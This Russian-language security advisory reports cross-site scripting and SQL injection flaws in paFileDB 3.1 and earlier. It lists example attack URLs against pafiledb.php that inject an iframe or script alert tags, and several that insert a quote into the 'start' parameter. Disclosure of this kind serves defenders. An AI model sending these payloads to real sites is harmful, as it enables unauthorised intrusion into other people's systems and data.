Программа: paFileDB 3.1 и более ранние версии

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
выполнить произвольные SQL команды в базе
данных уязвимого приложения.

1. Межсайтовый скриптинг возможен из-за
некорректной фильтрации входных данных в
некоторых параметрах. Злоумышленник может
с помощью специально сформированного URL
выполнить произвольный HTML сценарий в
браузере целевого пользователя.

Примеры:

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start=">
<iframe%20src=http://www.securityreason.com></iframe>&sortby=rating

http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start=">
<iframe%20src=http://www.securityreason.com></iframe>&sortby=date

http://[target]/[pafiledb_dir]/pafiledb.php?"><script>alert();</script>

http://[target]/[pafiledb_d ir]/pafiledb.php?action="><script>alert();</script>

http://[target]/[pafiledb_dir]/pafiledb.php?[something]=">< script>alert();</script>

http://[target]/[pafiledb_dir]/p
afiledb.php?[something]=&[something]="> <script>alert();</script>

2. Отсутствует фильтрация входных данных в
параметре start. Удаленный пользователь может
с помощью специально сформированного URL
выполнить произвольные SQL команды на
уязвимой системе.

Пример:

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating

http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии